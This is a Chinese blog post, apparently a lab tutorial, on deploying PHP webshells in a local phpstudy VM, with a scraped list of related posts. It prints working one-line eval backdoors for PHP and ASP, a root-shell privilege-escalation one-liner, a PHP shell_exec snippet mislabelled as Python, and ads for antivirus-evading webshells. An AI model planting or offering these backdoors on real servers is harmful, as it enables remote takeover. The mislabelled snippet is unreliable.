webshell--大马实战

最新推荐文章于 2025-04-18 15:43:30 发布
最新推荐文章于 2025-04-18 15:43:30 发布
阅读量1k 收藏 1
点赞数 1
文章标签: windows 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51214674/article/details/132570422
版权

webshell

​ WebShell 是一个网站的后门,也是一个命令解释器。通过Web 方式,使用HTTP| HTTPS 协议传递命令消息到服务器,并且继承了Web 用户的权限,在服务器上远程执行命令。WebShell 从本质上讲,就是服务器端可运行的脚本文件。

  • WebShell 接收来自于Web 用户的命令,然后在服务器端执行,也称为网站木马、木马后门、网马等。

大马实战

PHP:https://github.com/tennc/webshell/

image-20230829204634030

image-20230829204812494

image-20230829204834558

打开虚拟机phpstudy,在C:\phpStudy\WWW\创建webshell文件

138shell/A/Ajax_PHP Command Shell.txt文件内容复制粘贴到C:\phpStudy\WWW\webshell\Ajax_PHP-Command-Shell.php

image-20230829205405129

浏览器url:192.168.17.182

image-20230829205510890

image-20230829210902228

image-20230829210915712

查看源代码知道密码

image-20230829210958830

image-20230829211017897

翻译一下

image-20230829211235746

小马

一句话木马,需要与中国菜刀配合。

特点:短小精悍,功能强大。

三大基本功能:文件管理、虚拟终端、数据库管理。

php 脚本格式:

<?php @eval($_REQUEST[777])?> //代码执行函数+传参点

asp 脚本形式:

<%eval request("777")%>

php-webshell大马(功能齐全)
10-28
php小马 详细的资源以后我会推荐 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里的admin为连接密码,可自由修改此密码。
php大马(webshell)
05-26
增加了到达部分敏感目录的快捷链接。除了登录密码部分,其它所有代码已经过base64_decode加密(免杀性能好),请自行修改$admin['pass']处的登录密码。由于此php大马的功能过于强大,请勿用于非法用途。
渗透测试实战:图片马与文件包含漏洞利用详解,一句话告诉你木马大马小马Webshell与Shell区别
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
04-18 946
Webshell是一种以ASP、PHP、JSP或CGI等网页文件形式存在的命令执行环境,通常被称为“网页后门”。黑客通过入侵网站后,将Webshell文件混入服务器的WEB目录(如),然后通过浏览器访问这些恶意脚本,获取命令执行权限,从而控制服务器Webshell的功能包括但不限于文件上传/下载、数据库操作、远程命令执行(RCE)以及权限提升。原理文件上传漏洞:绕过上传过滤,直接上传恶意脚本。SQL注入漏洞:通过注入写入文件到服务器目录。RCE漏洞:利用代码执行漏洞运行恶意命令。
WebShell-大马实战
yuan_boss的博客
08-29 2126
webshell-大马下载地址:https://gitee.com/yuan_boss/labs.git。注意,要复现ASPX文件的大马,需要.NET环境,所以在搭建IIS服务器的时候,我们需要勾上上面的那些。里面有些大马的连接密码可以修改,如果不知道密码,可以自行查看源码。使用资料中的大马:AspxSpy2014Final.aspx。登录之后,就可以看到功能界面了,这里演示cmd操作。上传asp大马,将大马放到IIS服务器的根目录。以下是jshell.jsp的大马。里面有许多功能,可以研究研究。
php大马 webshell.zip
03-05
webshell,可以拿站,不过一定要清除痕迹 ,不然不要做非法用途。否则后果自负。
WebShell
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
12-11 3096
WebShell 解释 在计算机科学中,Shell 俗称壳(用来区别“核”),是指“为使用者提供操作界面”的软件(命令解释器)。类似于windows 系统给的cmd.exe 或者Linux 下bash/sh 等,虽然这些系统的命令解释器不止一种。 WebShell 是一个网站的后门,也是一个命令解释器,不过是以Web 方式(HTTP 协议)通信(传递命令消息),继承了Web 用户的权限。WebShell 本质上是服务器端可运行的脚本文件,后缀名为.php/.asp/.aspx/.js...
webshell大马(asp,jsp,php)
weixin_56537388的博客
08-29 2218
可以在Windows Server虚拟机中搭建,具体的搭建步骤网上很多教程,这里不再赘述,这里主要演示asp大马的效果:上传asp大马,将大马放到IIS服务器的根目录。注意,要复现ASPX文件的大马,需要.NET环境,所以在搭建IIS服务器的时候,我们需要勾上上面的那些,使用大马:AspxSpy2014Final.aspx。需要搭建Tomcat环境,才能执行jsp文件。Tomcat环境配置教程网上有,也可以参考我这篇文章:Tomcat配置。登录之后,就可以看到功能界面了,这里演示cmd操作。
实战渗透-一次拿到webshell后艰难的提权
qq_29437513的博客
07-25 2213
记上一篇,拿到webhshell后,数据库是dba, 本地上传一个cmd.exe组件上去后,执行失败 网上很多说改路径,写的也写不明白,想到之前迪哥用过的大马提权, 环境是php,但支持asp,有iis组件, 发现 D://recycle可写,传一个cmd.com组件执行命令 权限真的很小,是 nt service 网络用户权限,ns的权限是不能执行net的 支持的组件,提权的时候用的找 ===================== 查看systeminfo,发现有200多个补丁,准备打溢出,目标机是可以
hackmap-[windows权限提升(windows提权思路)]
m0_43405474的博客
04-09 5110
hackmap-[windows权限提升{windows提权思路}]1.前言1.1.提权分类水平权限提升(越权)垂直权限提升1.2 windows提权概述2.windows基于WebShell提权2.1 前言2.1.1 asp大马 vs aspx大马(windows2003+IIS)1)asp大马2)aspx大马3)小结2.1.2 基于系统漏洞提权1)信息收集2)漏洞补丁对照表3)提权过程3.实战3.1针对2003 KB952004 提权实验step1:利用aspx大马进行信息搜集——补丁安装情况step2
上传webshell(sqlmap实战续集)
qq_46485934的博客
09-14 1154
什么是webshell webshell是web入侵的脚本攻击工具。 简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。 webshell的分类 ①根据文件大小分类:大马和小马(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它) ②根据脚本名称分类:js
实战渗透-记一次文件上传拿到aspx站点(1)
qq_29437513的博客
09-01 683
这两天实在有些忙,,前段时间拿到的某个SHELL,今天打算放放,接着挖信息泄露 站点大概是这样的,, http://ABC.xxxx.xxx.cn/HxxQxx/login 登录地址 登录后台后,拿到后台管理权限 找到两个上传点 1.植物处的一处文件上传 2.新闻管理的一处上传 ,在第一处上传附件是保存为图片,,burp抓包看到解析的内容有些多,抓包改包结果没成功 ,第二处上传附件从站点首页看到有docx,excel等类型,,这个地方大概率能传马 抓包的时候有safedog-flow-item字段,,传
最新的PHP WEBshell大马
01-13
最新的WEBshell大马,亲测可用,若有侵权,请联系CSDN管理员删除
过安全狗asp大马webshell 第一美人
04-21
2013年最新的asp大马。功能最强大的asp大马。可过安全狗。防删除隐藏,第一美人asp大马下载
PHP大马 源码
04-18
PHP大马 源码
PHPwebshell提权源码
08-07
PHPwebshell提权源码 集合控制台 网路 链接 账户 打包 修改文件
wso_webshell_php_
10-01
Webshell
利用WebShell拿Shell技巧
悦分享
08-01 2245
webshell就是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php等后门文件与网站服务器WEB目录下正常的网页文件混在一起,可以使用浏览器来访问留下的后门,达到控制网站服务器的目的。shell的含义是取得对服务器某种程度上的操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。...
剖析php大马,WebShell 剖析与变形
weixin_39960147的博客
03-28 903
在测试中经常说到要传马 , 这里的马就是指 WebShell . 一般马被分为小马和大马 , 按功能的强弱划分 . 最常用的 WebShell 就是一句话木马 . 这里从 PHP的WebShell 入手 , 来看一下这些 WebShell 是如何执行 , 如何变形的文章内容可能比较多 , 但是耐心看完后你定会有收获最基本的WebShell结构下面是非常经典的一句话木马其实每个 WebShell 都...
webshell
xlh006的博客
09-12 2784
一、什么是webshell webshell简介 webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至...
php大马
03-19
### 关于 PHP 大马 的相关资源和教程 #### 背景介绍 PHP大马是一种常见的Webshell形式,通常被攻击者用来控制目标服务器。通过上传并执行特定的PHP脚本文件,攻击者能够实现远程命令执行、文件管理等功能[^1]。 #### 常见的 PHP 大马 工作原理 当一个 PHP 大马 被成功部署到目标服务器后,它可以通过预设的功能模块完成一系列操作。例如,在某些情况下,PHP大马会将自身的访问地址及其密码发送至指定的外部服务器以供进一步利用[^3]。这种行为可能导致敏感数据泄露甚至整个系统的安全风险增加。 #### 如何查找学习资料? 对于希望了解如何防御此类威胁或者研究其技术细节的学习者来说,可以从以下几个方面入手: 1. **基础理论知识** 学习有关 Web 应用程序安全性基础知识非常重要,这包括但不限于 SQL 注入防护、XSS 攻击防范等内容。这些概念构成了抵御恶意软件的基础。 2. **实际案例分析** 参考具体实例有助于加深理解。比如,“实战分析PHP大马隐藏后门——案例二”提供了详细的步骤说明和技术要点解析。 3. **工具使用技巧** 掌握一些常用的安全测试工具有助于提高效率。像 IceScalpel (冰蝎) 这样的工具因其独特的免杀特性而受到广泛关注[^4]。它的核心机制之一涉及将输入流转换成可执行指令序列 `$post=file_get_contents("php://input");` ,从而绕过传统防病毒引擎检测。 4. **操作系统层面加固措施** 如果运行的是基于 Linux 的环境,则还需要考虑系统级别的权限提升问题。一种方法是利用 Python 实现 root 权限获取 `python -c 'import os; os.setuid(0); os.system("/bin/sh")'` 。不过需要注意的是,这种方法仅适用于存在漏洞的情况下有效,并且应当谨慎对待任何可能影响合法业务流程的操作[^5]。 以下是部分推荐方向链接(假设为虚构站点用于示例展示),请自行甄别真实性与合法性后再做决定: - 官方文档 https://www.php.net/manual/zh/ - OWASP Top Ten Project https://owasp.org/www-project-top-ten/ ```python # 示例代码片段演示简单的文件读取功能 <?php if(isset($_POST['cmd'])){ $output = shell_exec($_POST['cmd']); echo "<pre>$output</pre>"; } ?> ``` 上述代码展示了最原始形态下的命令注入隐患,请勿随意尝试部署以免造成不必要的损失!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

§666§

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值